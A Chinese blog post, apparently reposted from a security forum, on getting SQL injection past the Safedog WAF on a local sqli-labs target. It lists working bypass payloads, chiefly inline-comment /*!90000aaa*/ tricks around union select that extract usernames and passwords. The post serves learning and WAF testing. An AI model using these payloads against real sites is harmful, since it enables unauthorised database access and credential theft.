在t00ls 里面我发的,放博客分享 记录一下
小菜写文章,太菜 希望大佬放过我!
主要分享一下,绕狗的思路 cms: sql-labs Mysql 注释符:# -- /**/ 0x01: 先从 and 1=1 绕过 http://192.168.89.132/Sql/Less-1/?id=1' and 1=1%23 有看过一些前辈的文章,多数都是利用注释符绕过 比如用 /*xxx*/ ?id=1%27and/*xxx*/1=1/*xxx*/%23 (以前 前辈的文章 xxx 进行 字符随机 绕过) 然后我就直接用前辈的怼了一下,发现安全狗拦截 想起CTF的 SQL 函数 进行FUZZ 套路, http://192.168.89.132/Sql/Less-1/?id=1' and (安全狗不拦截) http://192.168.89.132/Sql/Less-1/?id=1' and 1=1 (安全狗拦截) 是空格出现的问题吗? 想到之前看过的文章 把空格 替换成 /**/ 或者 /*xxxx*/ http://192.168.89.132/Sql/Less-1/?id=1' an1d 1=1(安全狗不拦截) 这里SQL 语句报错, (单个 放and ,单个放 xxx=xxx 安全狗并不拦截 ) 在and 和 xx =xx 放在一起进行了拦截 所以把 and xx=xx 的固定格式进行扰乱 把xx=xx 看做一个整体 放在/*!*/xx=xx/*!*/ 让waf匹配不到 and/**/1=1/**/ (安全狗拦截) and/*!*/1=1/*!*/ (安全狗不拦截) 0x02: 现在 尝试 order by http://192.168.89.132/Sql/Less-1/?id=1' order by (安全狗不拦截) http://192.168.89.132/Sql/Less-1/?id=1' order by 1(安全狗拦截) 按照刚刚的思路 进行模糊测试 http://192.168.89.132/Sql/Less-1/?id=1' order b1y 1(安全狗不拦截) http://192.168.89.132/Sql/Less-1/?id=1' ord1er by 1(安全狗不拦截) 汇总不拦截: http://192.168.89.132/Sql/Less-1/?id=1' order b1y 1(安全狗不拦截) http://192.168.89.132/Sql/Less-1/?id=1' ord1er by 1(安全狗不拦截) 现在用刚刚 绕 and 1=1 的思路 来绕 order by http://192.168.89.132/Sql/Less-1/?id=1' /*!order*/ by 1(安全狗不拦截) 0x03: SQL查询语句 绕过 这里以(union select 测试) http://192.168.89.132/Sql/Less-1/?id=1' union select (安全狗拦截) 测试了几组 http://192.168.89.132/Sql/Less-1/?id=1' union/*!*/select/*!*/ http://192.168.89.132/Sql/Less-1/?id=1' union /*!select*/ (安全狗拦截) http://192.168.89.132/Sql/Less-1/?id=1' /*!union*//*!select */(安全狗拦截) 发现刚刚的操作 不行了 于是乎 /*!50001*/ 这样想走一波 发现也不可以 这里我就不解释/*!50001*/ 大佬们都知道 因为我记得去年 第一次绕狗的时候,还截图纪念了一下 用 /*!50001*/ 附一下老图: 以前绕的payload:'/*!50001union*//*!select*/user,passwor fromusers 后来想了一下继续打乱的方法 到这里还是采用了 0x01 的思路 and/*!*/1=1/*!*/ (安全狗不拦截) http://192.168.89.132/Sql/Less-1/?id=1%27union/*!90000aaa*/select/*!90000aaa*/%201,2,3%23 (安全狗不拦截) union/*!90000aaa*/select/*!90000aaa*/from (安全狗不拦截) 模糊测试拦截位置 union/*!90000aaa*/select/*!90000aaa*/fr111om users (安全狗不拦截) 猜想 from xxx 拦截? from xxx union/*!90000aaa*/select/*!90000aaa*/from users union select from xxx 也就是说 union select 是一个整体 在加上 from xxx会拦截 那么我把from xxx再放起来 http://192.168.89.132/Sql/Less-1/?id=-1%27union/*!90000aaa*/select%201,2,3/*!90000aaa*//*!90000aaa*/from%20information_schema.tables/*!90000aaa*/%23(安全狗不拦截) http://192.168.89.132/Sql/Less-1/?id=-1%27union/*!90000aaa*/select%201,username,password/*!90000aaa*//*!90000aaa*/from%20users%20limit%202,1/*!90000aaa*/%23 (安全狗不拦截) 后面写了一个安全狗的tamper 绕狗的方法还有很多,继续学习····· 安全狗其实用参数污染 绕更方便一点。 |
绕最新版安全狗-附上sqlmap的tamper的更多相关文章
-
关于sqlmap当中tamper脚本编码绕过原理的一些总结(学习python没多久有些地方肯定理解有些小问题)
sqlmap中tamper脚本分析编写 置十对一些编码实现的脚本,很多sqlmap里面需要引用的无法实现,所以有一部分例如keywords就只写写了几个引用了一下,其实这里很多脚本运用是可以绕过安全狗 ...
-
使用sqlmap中tamper脚本绕过waf
使用sqlmap中tamper脚本绕过waf 刘海哥 · 2015/02/02 11:26 0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap- ...
-
(四)SQLMap之Tamper篡改脚本的类型、作用、适用场景
目录结构 一.SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二.适配不同数据库类型的测试tamper 三.SQLMap中tamper篡改脚本的功能解释 一.SQLMa ...
-
sqlmap中tamper脚本绕过waf
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习. 根据sqlmap中的tamper脚本可以学习过绕过一些技 ...
-
SQLMAP之tamper详解
sqlmap 是一款注入神器广为人知,里面的 tamper 常常用来绕过 WAF ,很实用的模块,但是却常常被新手忽略(比如我),今天就整理总结一下 tamper 的用法以及 tamper 的编写 P ...
-
绕过WAF、安全狗知识整理
0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐.安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 ...
-
sqlmap 使用总结
一直在用sqlmap,一直在浅层的使用方面,所以我想深入了解一下sqlmap. 参考文章: Sqlmap使用教程[个人笔记精华整理] http://www.vuln.cn/1992 sq ...
-
SQLMAP大全
转自:http://blog.csdn.net/zsf1235/article/details/50974194 本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用 ...
-
绕过D盾安全狗连接菜刀
0x00 各种奇葩符号 现在基本上没啥用了,毕竟几年前的小玩意儿 /;.xxx.asp;.jpg /;.asp/.jpg 像这种各位看官可以忽略了,毕竟某狗和某盾也不是吃干饭的,写出来只是为了纪念一下 ...
随机推荐
-
Servlet连接数据库及日期格式转换
package oracleFactory; import java.io.IOException; import java.io.PrintWriter; import java.sql.Conne ...
-
codeblocks中添加-std=c99
早上用codeblocks编译一个c文件,出现这样一个编译错误: +'for'+loop+initial+declarations+are+only+allowed+in+C99+mode 原来cod ...
-
208. Implement Trie (Prefix Tree)
题目: Implement a trie with insert, search, and startsWith methods. 链接: http://leetcode.com/problems/i ...
-
android.support.design.widget.AppBarLayout 在android5.0+底部显示空白条问题
在最外层使用 RelativeLayout作为根节点,同时设置 android:fitsSystemWindows="true"问题解决. <?xml version=&qu ...
-
mysql 分析2 show processlist ;
show processlist ; 可以查看当前有哪些链接 处于什么状态 分析语句 那些连接处于什么状态 (需要通过脚本观察一段时间内的有运行情况做出统计一直刷新服务器运行状态 ) 当出现下面的几种 ...
-
【Python基础】lpthw - Exercise 45 制作游戏
作者在本节中给出了 一些风格建议. 一.函数的风格 1. 类里面的函数经常被称作“方法”,但实质上它和函数没什么不同. 2. 使用类的时候,可以用动词而不是名词给函数命名,指明其具体功能,例如list ...
-
FPGA跨时钟域握手信号的结构
FPGA跨时钟数据传输,是我们经常遇到的问题的,下面给出一种跨时钟握手操作的电路结构.先上图 先对与其他人的结构,这个结构最大的特点是使用 req 从低到高或者高到低的变化 来表示DIN数据有效并开始 ...
-
6-MVC结构简介
一.javeEE的项目结构层次:MVC1.Model:模型层(DAO+业务层) 2.View:视图层 jsp3.Control:控制层 servlet 二.分层的原则:1.层与层之间松耦合,层内保持高 ...
-
fuel6.0安装部署
在经过一系列安装openstack方式后,个人觉得fuel的安装方式相对简易,接下来记录下安装部署fuel6.0的过程.本教程适合想把fuel6.0部署后,云主机需要连接外网的需求. 安装virtua ...
-
ABBYY PDF Transformer+安装教程
ABBYY PDF Transformer+是一个新的全功能PDF文档工具,涵盖整个文档生命周期所涉及的各项功能,包括创建.讨论.批准.保护.转换成可编辑格式的PDF文件.文件合并.文本和图像的提取等 ...